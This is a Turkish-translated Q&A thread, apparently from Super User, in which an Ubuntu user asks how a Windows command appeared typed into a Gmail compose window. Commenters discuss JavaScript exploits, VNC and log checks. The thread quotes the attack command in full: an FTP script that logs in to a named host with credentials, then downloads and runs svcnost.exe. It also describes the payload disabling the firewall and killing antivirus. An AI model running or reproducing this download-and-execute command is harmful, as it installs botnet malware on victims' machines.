Linux bilgisayarımın saldırıya uğradığını nasıl belirleyebilirim?


128

Ev bilgisayarım genellikle açık, ancak ekran kapalı. Bu akşam işten eve geldim ve hack girişimi gibi görünen şeyleri buldum: tarayıcımda Gmail'im açıktı (bu bendim), ancak bu TOalanda aşağıdakilerle oluşturuldu :

md / c echo açık cCTeamFtp.yi.org 21 >> ik & echo kullanıcısı ccteam10 765824 >> ik & echo binary >> ik & echo svcnost.exe olsun >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik ik & svcnost.exe & çıkış eko Sahip oldunuz

Bu bana Windows komut satırı koduna benziyor ve mdGmail'in oluşturma modunda olmasıyla birlikte kodun başlaması, birinin cmdkomut çalıştırmaya çalıştığını açıkça gösteriyor . Sanırım bu bilgisayarda Windows çalıştırmadığım için şanslıydım, ancak başkaları da var. Bu, böyle bir şeyin başıma geldiği ilk kez. Linux gurusu değilim ve o zaman Firefox dışında başka programlar da çalıştırmıyordum.

Bunu yazmadığımdan kesinlikle eminim ve fiziksel olarak bilgisayarımdan başka kimse yoktu. Ayrıca, yakın zamanda Google şifremi (ve diğer tüm şifrelerimi) benzer bir şeyle değiştirdim, vMA8ogd7bvbu yüzden birinin Google hesabıma saldırdığını sanmıyorum.

Az önce ne oldu? Büyükannemin yıllardır kötü amaçlı yazılımlar çalıştıran eski Windows makinesi değil de yeni bir Ubuntu kurulumu olduğunda, birisi bilgisayarıma nasıl tuş vuruşlar yapıyor?

Güncelleme:
Bazı nokta ve soruları ele alalım:

  • Kırsal kesimde Avusturya'dayım. WLAN yönlendiricim WPA2 / PSK ve sözlükte bulunmayan güçlü bir şifre kullanıyor; buradan kaba kuvvet ve 50 metreden daha kısa bir mesafede olması gerekirdi; saldırıya uğraması muhtemel değildir.
  • USB kablolu klavye kullanıyorum, bu yüzden yine de herkesin menzil içinde kalması pek mümkün değil.
  • O zaman bilgisayarımı kullanmıyordum; Ben işteyken sadece evde boştaydı. Monitöre monte nettop bir bilgisayar olduğu için nadiren kapatıyorum.
  • Makine sadece iki aylık, sadece Ubuntu kullanıyor ve ben garip yazılım kullanmıyorum veya garip siteleri ziyaret etmiyorum. Ağırlıklı olarak Stack Exchange, Gmail ve gazeteler var. Oyun yok. Ubuntu kendini güncel tutacak şekilde ayarlandı.
  • Çalışan herhangi bir VNC hizmetinin farkında değilim; Kesinlikle bir tane yüklemedi veya etkinleştirmedim. Ayrıca başka bir sunucu başlatmadım. Varsayılan olarak Ubuntu'da çalıştığından emin değilim?
  • Gmail’in hesap etkinliğindeki tüm IP adreslerini biliyorum. Google'ın giriş kapısı olmadığından eminim.
  • Günlük Dosyası Görüntüleyici buldum , ancak ne arayacağımı bilmiyorum. Yardım?

Gerçekten bilmek istediğim şey, ve beni gerçekten güvensiz hissettiren şey: İnternetten biri makinemde nasıl tuş vuruşları yaratabilir? Bununla ilgili tüm teneke şapka olmadan bunu nasıl önleyebilirim? Ben bir Linux geek değilim, 20+ yıldır Windows ile uğraşan ve bıktım bir babayım. Ve çevrimiçi olduğun 18+ yıl boyunca, kişisel olarak herhangi bir hack girişimi görmedim, bu yüzden bu benim için yeni.


4
Başka birisinin bilgisayarınıza erişimi var mı ya da çok eski bir kablosuz klavyeniz var mı? Ayrıca, Ubuntu'da yerleşik bir VNC sunucusu vardır. Eğer aktifse, bir yere bağlanmış rastgele bir komut dosyası bağlanabilir ve bir Windows bilgisayarı olduğunu varsayar, tuş vuruşlarını gönderir WIN + R, cmd ......
TuxRug

29
@torbengb: Mesajınız beni gerçekten korkutuyor ...
Mehrdad

9
Kablosuz ağınızda başka bilgisayarlar var mı? Saldırgan girdiyse onların güvenliğini çeşitli şekillerde Ubuntu kutusunu çatlama yol açabilecek yerel ağa kendisine bir "in" verecekti.
CarlF

4
@muntoo ... ve eminim ki bunu hiçbir yere yazmamışsınız ve onları yönetmek için herhangi bir uygulamayı kullanmıyorsunuz, değil mi? Şifre basmaya başlamayalım; en azından şifrem password:-) değil
Torben Gundtofte-Bruun

6
Kedin var mı?
Zaki

Yanıtlar:


66

Endişelenecek bir şey olduğundan şüpheliyim. İndirme işlemiyle bir sürücü yapmaya çalışan bir JavaScript saldırısı olasılığı daha fazlaydı . Bu konuda endişeliyseniz, NoScript ve AdBlock Plus Firefox Eklentileri kullanmaya başlayın .

Güvenilir siteleri ziyaret etmek bile güvenli değil, çünkü zararlı olabilecek üçüncü taraf reklamverenlerden gelen JavaScript kodunu kullanıyorlar.

Onu yakaladım ve bir sanal makinede çalıştırdım. Bu mirc yüklü ve bu durum günlüğü ... http://pastebin.com/Mn85akMk

MIRC'yi indirmenize ve sizi spambotlara dönüştürecek bir botnet'e katılmanıza yardımcı olan otomatik bir saldırıdır ... VM'm bir araya geldi ve biri olan bir kaç farklı uzak adresle bağlantı kurdu autoemail-119.west320.com.

Windows 7'de çalıştırıyorum UAC istemini kabul etmem ve güvenlik duvarı üzerinden erişmesine izin vermem gerekiyordu.

Diğer forumlarda bu tam komutun tonlarca raporu var gibi görünüyor ve hatta bir torrent dosyası indirmeyi tamamladığında çalıştırmayı denediğini bile söylüyor ... Bunun nasıl mümkün olacağından emin değilim.

Bunu kendim kullanmadım, ancak şu anki ağ bağlantılarını gösterebilmeli, böylece normal olmayan bir şeye bağlı olup olmadığınızı görebilirsiniz: http://netactview.sourceforge.net/download.html


10
Er, neden tüm yorumlar ( senaryonun bir pencere açmaya çalıştığını keşfeden son derece alakalı olanlar bile cmd) silindi?
BlueRaja - Danny Pflughoeft

UBlock Origin'i kullanmaya yeni başlamam durumunda bu tür bir saldırıya karşı güvende olur muydum?
RobotUnderscore,

42

@ Jb48394 ile muhtemelen bugünlerde her şey gibi bir JavaScript istismarının olduğunu kabul ediyorum .

Bir cmdpencereyi açmaya ( aslında @ torbengb'in yorumuna bakınız ) ve kötü niyetli bir komutu çalıştırmaya çalıştığı gerçeği, sadece arka plandaki trojanın dikkatlice indirilmesi yerine , Firefox'ta tuş vuruşlarına girmesine izin veren bir güvenlik açığından yararlandığını gösteriyor. kod çalıştırma

Bu ayrıca, yalnızca Windows için açıkça yazılmış bu açıklamanın neden Linux'ta çalıştığını da açıklar : Firefox, JavaScript’i tüm işletim sistemlerinde aynı şekilde çalıştırır (en azından dener :)) . Windows'a yönelik bir arabellek taşması veya benzeri bir istismara neden olsaydı, programı yeni çökertirdi.

JavaScript kodunun nereden geldiğine gelince - muhtemelen kötü niyetli bir Google reklamı (reklamlar Gmail’de gün boyunca yayınlanıyor) . Bu olmaz olmak ilk sefer .


4
Güzel referanslar.
kizzx2

9
Skimmers için FYI, bu son "link" aslında beş ayrı link.
Pops

Firefox'um normalde günlerce açık kaldığı için gerçekten bir Javascript açıklığı olması oldukça şok edici olurdu. Ancak, anahtarları Windows altında başka bir sisteme ve muhtemelen Linux altında farklı bir sistem çağrısına (varsa) anahtar göndermek için özel API'yi aramanız gerekir. Tuş vuruşlarını gönderme normal bir Javascript işlemi olmadığından, Firefox'un bunun için bir çapraz platform çağrısı yapacağından şüpheliyim.
billc.cn


12

Benzer bir Linux makinesinde de benzer bir saldırı buldum . Görünüşe göre Windows için bir çeşit FTP komutu var.


8
Daha doğrusu, ftp://ccteam10:765824@cCTeamFtp.yi.org/svcnost.exeWindows ftpkomut satırı aracını kullanarak dosyayı indirir ve çalıştırır .
Grawity



9
Taşınabilir bir mIRC kurulumu ve "DriverUpdate.exe" adlı bir dosya içeren bir WinRAR SFX paketidir. DriverUpdate.exe (en az) iki kabuk komutu yürütür: netsh güvenlik duvarı opmode'u devre dışı bırakır ve taskkill / F / IM VCSPAWN.EXE / T Ayrıca Internet Explorer'ın güvenilir bölgesine die-freesms-seite.com eklemeyi dener (bence) ve vekil bypass.
Andrew Lambert,

5

Bu, tüm sorunuzu yanıtlamaz, ancak günlük dosyasında başarısız oturum açma girişimlerini arayın.

Kayıt defterinizde yaklaşık beşten fazla başarısız girişim varsa, o zaman biri çatlamaya çalıştı root. rootBilgisayarınızdan uzaktayken oturum açmak için başarılı bir girişimde bulunuyorsanız , ŞİFRENİZİ HEMEN DEĞİŞTİRİN !! ŞİMDİ DOĞRU demek! Tercihen alfanümerik bir şeye ve yaklaşık 10 karakter uzunluğundadır.

Aldığınız mesajlarla ( echokomutlar) bu gerçekten olgunlaşmamış bir senaryo kiddie gibi geliyor . Ne yaptığını bilen gerçek bir bilgisayar korsanı olsaydı, muhtemelen hala bunu bilmiyor olacaktın.


2
Bunun açıkça amatörce olduğuna katılıyorum. En azından sonunda sahip olduğun yankıları koymamalılardı . Herhangi bir "gerçek bilgisayar korsanının" daha önce geçtiğini merak ettim mi? Ya da belki de kaç tane
Torben Gundtofte-Bruun,

1
@torgengb: Eğer komut bir windows komut isteminde çalıştırılmış olsaydı, ekoyu görmezdiniz (çünkü &exit)
BlueRaja - Danny Pflughoeft

-1

whois west320.com'un Microsoft'a ait olduğunu bildiren raporlar.

UPnP ve Vino (Sistem -> Tercihler -> Uzak Masaüstü) zayıf bir Ubuntu şifresiyle birleştirildi mi?

Herhangi bir standart dışı havuz kullandınız mı?

DEF CON her yıl bir Wi-Fi erişim noktasına ne kadar ulaşılabileceği konusunda bir Wi-Fi yarışmasına katılıyor - en son 250 mil olduğunu duydum.

Gerçekten korkmak istiyorsan, bir Zeus botnet'in kumanda kontrol merkezinin ekran görüntülerine bak . Hiçbir makine güvenli değildir, ancak Linux'taki Firefox diğerlerinden daha güvenlidir. Daha da iyisi, eğer SELinux kullanıyorsanız .


1
Bu istismarın yazarı açıkça bunu Linux'ta çalıştırmak niyetinde değildi, bu yüzden savunmasız bir gnome programı veya zayıf bir şifre ile ilgisi olduğundan şüpheliyim (ayrıca OP zaten güvenli bir şifresi olduğunu belirtti)
BlueRaja - Danny Pflughoeft

Aslında, sadece bir gmail ve kablosuz parola olan bir Ubuntu şifresine sahip olduğundan bahsetmiyor. Metasploit'i çalıştıran bir çocuk Linux hakkında bir şey bilmiyor olabilir, sadece VNC'yi görüyor. Büyük olasılıkla bir javascript saldırısı.
rjt
Sitemizi kullandığınızda şunları okuyup anladığınızı kabul etmiş olursunuz: Çerez Politikası ve Gizlilik Politikası.
Licensed under cc by-sa 3.0 with attribution required.